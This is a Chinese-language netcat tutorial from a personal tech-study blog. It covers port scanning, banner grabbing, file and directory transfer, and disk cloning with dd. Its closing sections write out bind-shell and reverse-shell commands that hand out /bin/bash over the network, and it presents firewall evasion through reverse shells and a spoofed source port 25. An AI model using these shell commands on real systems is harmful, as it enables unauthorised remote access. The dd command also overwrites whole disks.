zdq0394.github.com

Tech study and research.

Follow me on GitHub

netcat——网络工具中的瑞士军刀

网络工具中的瑞士军刀——netcat,能通过TCPUDP在网络中读写数据。

端口扫描

端口扫描经常被系统管理员和黑客用来发现一些机器上的开放端口,帮助他们识别系统中的漏洞。

$nc -z -v -n 172.31.100.7 21-25

可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp。

z:使用ZeroI/O模式,用于扫描。

v:Verbose。

n:不要使用DNS反向查询IP地址的域名。

该命令会打印21到25所有开放的端口。

一旦发现开放的端口,可以很容易的使用netcat连接服务抓取他们的banner。例如:

$nc -v 172.31.100.7 21

netcat命令会连接开放端口21并且打印运行在这个端口上服务的banner信息。

Chat Server

本例中我们构造一个聊天服务。

Server端

$nc -l 1567

netcat命令在1567端口启动了一个tcp服务器,所有的标准输出和输入都会输出到该端口。并且输出和输入都在此shell中展示。

Client端

$nc 172.31.100.7 1567

不管在客户端上键入什么都会出现在服务端;同样,不管在服务端键入什么也都会出现在客户端。

文件传输

Server端

$nc -l 1567 < file.txt

Client端

$nc -n 172.31.100.7 1567 > file.txt

创建了一个服务器在A上并且重定向netcat的输入为文件file.txt。任何成功连接到该端口的客户端,netcat都会发送file文件的内容到对方。

在客户端我们重定向输出到file.txt,当B连接到A,A发送文件内容,B保存文件内容到file.txt。

没有必要创建文件源作为Server,也可以以相反的方法使用。 像下面的例子,发送文件从B到A,但是服务器创建在A上,这次仅需要重定向netcat的输出并且重定向B的输入文件。

Server端

$nc -l 1567 > file.txt

Client端

$nc 172.31.100.23 1567 < file.txt

目录传输

发送一个文件很简单,但是如果要发送多个文件,或者整个目录,一样很简单,只需要使用压缩工具tar,压缩后发送压缩包。

如果你想要通过网络传输一个目录从A到B。

Server端

$tar -cvf – dir_name | nc -l 1567

Client端

$nc -n 172.31.100.7 1567 | tar -xvf -

在A服务器创建一个tar归档包并且通过-在控制台重定向它,然后使用管道,重定向给netcat,netcat可以通过网络发送它。

在客户端下载该压缩包,通过netcat管道然后打开文件。

如果想要节省带宽传输压缩包,可以使用bzip2或者其他工具压缩。

Server

$tar -cvf – dir_name | bzip2 -z | nc -l 1567

Client端口

$nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -

加密通过网络发送的数据

如果担心网络上发送数据的安全,可以在发送数据之前用如mcrypt的工具加密。

服务端

$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

客户端

$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

以上两个命令会提示需要密码,确保两端使用相同的密码。

这里是使用mcrypt用来加密,使用其它任意加密工具都可以。

流视频

虽然不是生成流视频的最好方法,但如果服务器上没有特定的工具,使用netcat,仍然有希望做成这件事。

服务端

$cat video.avi | nc -l 1567

从一个视频文件中读入并重定向输出到netcat客户端

$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

从socket中读入数据并重定向到mplayer。

克隆一个设备

如果已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而不想再重复配置一遍。 不再需要重复配置安装的过程,只启动另一台机器的一些引导可以克隆你的机器。

克隆Linux PC很简单,假如系统在磁盘/dev/sda上

Server端

$dd if=/dev/sda | nc -l 1567

Client端

$nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd是一个从磁盘读取原始数据的工具,通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。 但是如果已经做过分区并且只需要克隆root分区,可以根据系统root分区的位置,更改sda为sda1,sda2等。

打开一个shell

假设netcat支持-c -e参数

Server端

$nc -l 1567 -e /bin/bash -i

Client端

$nc 172.31.100.7 1567

这里创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash

假如netcat不支持-c或者-e参数(openbsd netcat)

Server端

$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell。 2>&1,是用来重定向标准错误输出和标准输出,然后管道到netcat运行的端口1567上。 至此,已经把netcat的输出重定向到fifo文件中。

说明:

  • 从网络收到的输入写到fifo文件中。
  • cat命令读取fifo文件并且其内容发送给sh命令
  • sh命令进程收到输入并把它写回到netcat。
  • netcat通过网络发送输出到client

至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待。 而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。

Client端

$nc -n 172.31.100.7 1567

会得到一个shell提示符在客户端

反向shell

服务端

$nc -l 1567

在客户端,简单地告诉netcat在连接完成后,执行shell。

客户端

$nc 172.31.100.7 1567 -e /bin/bash

反向shell经常被用来绕过防火墙的限制,如阻止入站连接。 例如,有一个专用IP地址为172.31.100.7,使用代理服务器连接到外部网络。如果想从网络外部访问这台机器如1.2.3.4的shell,那么会用反向外壳用于这一目的。

指定源端口

假设防火墙过滤除25端口外的其它所有端口,需要使用-p选项指定源端口。

服务器端

$nc -l 1567

客户端

$nc 172.31.100.7 1567 -p 25

使用1024以内的端口需要root权限。 该命令将在客户端开启25端口用于通讯,否则将使用随机端口。

指定源地址

假设机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。 可以在netcat中使用-s选项指定ip地址。

服务器端

$nc -u -l 1567 < file.txt

客户端

$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

该命令将绑定地址172.31.100.5。